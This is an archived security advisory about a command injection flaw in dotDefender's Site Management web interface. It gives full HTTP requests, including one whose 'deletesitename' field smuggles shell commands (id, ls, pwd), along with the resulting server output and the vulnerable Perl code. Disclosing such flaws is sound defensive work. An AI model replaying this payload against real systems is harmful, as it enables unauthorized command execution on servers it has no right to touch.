AOH :: HP Unsorted R :: BT-22051.HTM

Remote Command Execution in dotDefender Site Management



Remote Command Execution in dotDefender Site Management
Remote Command Execution in dotDefender Site Management



Problem Description
==================
A remote command execution vulnerability exists in the dotDefender
(3.8-5) Site Management.


dotDefender [1] is a web appliaction firewall (WAF) which 'prevents
hackers from attacking your
website.'


Technical Details
================
The Site Management application of dotDefender is reachable as a web
application (https:site/dotDefender/)
on the webserver. After passing the Basic Auth login you can
create/delete applications.
The mentioned vulnerability is in the 'deletesite' implementation and
the 'deletesitename' variable.
Insufficient input validation allows an attacker to inject arbitrary commands.


Delete Site
==========
A normal delete transaction looks as follow:

  POST /dotDefender/index.cgi HTTP/1.1
  Host: 172.16.159.132
  User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: https://172.16.159.132/dotDefender/index.cgi
  Authorization: Basic YWRtaW46
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 76

  sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14

An attack looks like:

--------------------/Request/--------------------
  POST /dotDefender/index.cgi HTTP/1.1
  Host: 172.16.159.132
  User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: https://172.16.159.132/dotDefender/index.cgi
  Authorization: Basic YWRtaW46
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 95

  sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
../;pwd;&action=deletesite&linenum=15

--------------------/Response/--------------------
[...]

uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin [...] Affected Code ============ The affected code (perl) is in index1.cgi of the admin interface: 311 312 }elsif($action eq "deletesite") { # delete site 313 $deletesitename=$postFields{"deletesitename"}; 314 $dots_index = index($deletesitename,"%3A"); 315 316 if($dots_index != -1 ) { 317 $site_a_part= substr($deletesitename,0,$dots_index); 318 $site_b_partsubstr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2); 319 $site_a_part=&cleanIt($site_a_part); 320 $site_b_part=&cleanIt($site_b_part); 321 $deletesitename = $site_a_part.":".$site_b_part; 322 } 323 324 $linenum=$postFields{'linenum'}; 325 applyDbAudit($action); 326 &delline($linenum,2); 327 cleanSiteFingerPrints($deletesitename); 328 329 &deleteSiteConf($deletesitename); 330 $site_params="$CTMP_DIR/".$deletesitename."_params"; 331 system("rm -f $site_params"); And applicure-lib2.pl: 13 sub cleanIt { 14 my($param,$type)=@_; 15 16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg; 17 if ($type eq 'any') { 18 } elsif ($type eq 'filter') { 19 $param =~ s/\+/" "/eg; 20 } elsif ($type eq 'path') { 21 $param = un_urlize($param); 22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g; 23 #$param =~ s/\+/" "/eg; 24 } else { 25 $param =~ s/([^A-Za-z0-9\-_.~'])//g; 26 } 27 return $param; 28 } Here one can see that certain shell control characters are not protected by the call to cleanIt. Thus an attacker can gain control of the system call in line 331 of index1.cgi. References ========== [1] http://applicure.com/

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.